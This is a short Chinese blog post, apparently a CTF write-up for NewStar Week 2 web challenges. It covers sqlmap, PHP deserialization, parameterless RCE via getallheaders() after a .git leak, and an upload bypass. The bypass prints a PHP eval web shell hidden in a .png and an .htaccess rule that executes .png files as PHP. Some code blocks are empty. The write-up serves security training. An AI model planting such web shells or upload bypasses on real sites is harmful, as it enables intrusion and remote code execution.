NewStart WEEK2 WEB
游戏高手
控制台修改gameScore参数值,然后挂掉就行。
ez_sql
SQLmap直接出
Unserialize?
反序列化,只要注意它是私有属性就行
exp:
1 |
|
R!!C!!E!!
题目提示要扫,那就扫!!!
dirsearch启动
扫出来发现.git
无法直接访问,但是可以访问它目录下的其他文件,
在.git/COMMIT_EDITMSG
目录下发现 bo0g1pop.php
源码
1 |
|
看到';' === preg_replace('/[^\W]+\((?R)?\)/'
这个经典正则,就知道考点是无参数读取文件。
ban掉了scandir
,考虑getallheaders()
用print_r
代替var_dump
先查看一下getallheaders()数组下可控的http头。
?star=print_r(getallheaders());
这里current
被ban了,用pos替代
虽然host可控,但是修改了就实例报错。。。。
但是ua头可以随便修改,所以用next
Upload again!
经测试发现,上传内容中对<?php
标签过滤了,采用长标签解析绕过。
1 | <script language='php'>@eval($_GET['a'])</script> |
改后缀为png
再上传.htaccess文件,对png文件进行解析。
1 | AddType application/x-httpd-php .png |
再访问upload/xxx.png
,就可以执行php代码了。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dragonkeep!
评论